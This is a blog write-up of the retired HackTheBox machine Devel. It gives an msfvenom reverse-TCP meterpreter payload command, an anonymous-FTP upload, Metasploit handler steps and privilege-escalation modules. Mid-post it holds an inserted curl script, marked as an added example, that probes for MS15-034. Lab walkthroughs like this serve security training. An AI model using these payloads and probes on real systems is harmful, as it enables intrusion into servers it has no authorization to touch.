
Ari Kalfus


Writeup: HackTheBox Devel - with Metasploit

This series will follow my exercises in HackTheBox.
All published writeups are for retired HTB machines.
Whether or not I use Metasploit to pwn the server will be indicated in the title.


Difficulty: Easy

Machine IP:

As always, I start enumeration with AutoRecon. The open ports are TCP/21 and TCP/80. While AutoRecon continues scanning, I look into the FTP server. It allows anonymous login! I note that in my mind map and leave it for now to check on the results of AutoRecon.

I look at what the nmap HTTP script scan found:


At the bottom of the results, I see a CVE was found:


I see this CVE is tied to MS15-034 (CVE-2015-1635, the HTTP.sys Range header bug) and run that through searchsploit:


I take a look at the C exploit:


I see that the main body of the exploit is simply a check for whether the target is vulnerable to this CVE; it does not give a shell.


Well, that would still be useful so let's compile and execute the code:


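The same vulnerability check can be done without compiling anything, by sending the oversized Range header the PoC uses and reading the HTTP status code back: an unpatched HTTP.sys answers 416, a patched one rejects the header with 400. The script below is an added example, not the searchsploit C exploit or code from the original post; the two sample responses in it are constructed, and the target URL is whatever you pass with --probe.

```shell
#!/bin/sh
# Added example (not from the original post): MS15-034 / CVE-2015-1635 check
# with curl instead of the compiled C PoC. SAMPLE_* below are constructed
# responses for offline use; the target URL is supplied by the caller.
set -eu

# The oversized Range value used by the public detection checks. This value
# only triggers the 416/400 difference; other ranges (e.g. a non-zero start
# against a large static file) crash an unpatched host, so do not "tune" it.
MS15_034_RANGE='bytes=0-18446744073709551615'

# Constructed sample header blocks (what `curl -I` would print).
SAMPLE_VULNERABLE='HTTP/1.1 416 Requested Range Not Satisfiable
Server: Microsoft-IIS/7.5'
SAMPLE_PATCHED='HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/7.5'

# Print the three-digit status code from the first line of a header block;
# prints nothing if the first line is not an HTTP status line.
http_status_code() {
  printf '%s\n' "$1" | sed -n '1s/^HTTP\/[0-9.]* \([0-9][0-9][0-9]\).*/\1/p'
}

# Classify a header block. Prints vulnerable / patched / unknown and returns
# 0 only for "vulnerable", so it can sit directly in an if/|| condition.
ms15_034_classify() {
  code=$(http_status_code "$1")
  case "$code" in
    416) echo vulnerable; return 0 ;;
    400) echo patched;    return 1 ;;
    *)   echo unknown;    return 2 ;;
  esac
}

# Live probe: header-only request (-I) carrying the malicious Range.
ms15_034_probe() {
  ms15_034_classify "$(curl -s -I --max-time 10 -H "Range: $MS15_034_RANGE" "$1")"
}

# Usage: ./ms15_034.sh --probe http://TARGET/
if [ "${1-}" = "--probe" ] && [ -n "${2-}" ]; then
  ms15_034_probe "$2"
fi
```

Run it as `sh ms15_034.sh --probe http://TARGET/`; anything other than a 416 or 400 (a proxy, a non-IIS server, a timeout) is reported as unknown rather than guessed.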
Great. Now what?

I back off and take another look at my enumeration results. I know this is a Windows machine because the server at TCP/80 is running IIS. I know it has a CVE. I know that I have anonymous access via FTP to the server, to a directory that appears to host the web server's files.

Ah. Ok.

Let's generate a reverse TCP meterpreter payload with msfvenom, push it to the target via FTP, then call it from the web server to execute and establish a shell back to my box.

The payload command is:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f aspx > devel.aspx

Substitute the LHOST and LPORT as applicable for your system.

I can now push the file via FTP with put:

# anonymous login
> put ./devel.aspx

Then I need to start a meterpreter handler on my machine listening on LPORT.

sudo msfconsole
msf> workspace htb
msf> use windows/meterpreter/reverse_tcp

I just need to set my local IP:


Then I can set up a local listener by converting this to a handler:


I can now execute my payload with a curl command:


Meterpreter records the session (ignore the whoami -> root command, I was confused about which terminal I was in):


I can now connect to the session I've created:


Now let's gather information on the system and check what user I am:


Ok, this is a Windows 7 machine with x86 architecture. I am logged in as the IIS user, which isn't going to give me much. I can't even write to my current directory. But, I should be able to write to C:\Windows\TEMP. I navigate over to there and then use post/multi/recon/local_exploit_suggester to suggest some exploit modules I can run to elevate my shell to administrator.


The machine seems to be vulnerable to exploit/windows/local/bypassuac_eventvwr - let's try that.

It is unsuccessful, as my IIS user isn't in the Administrators group. On to the next.


The second exploit, exploit/windows/local/ms10_015_kitrap0d is successful.


I can now go and retrieve the user and root flags.


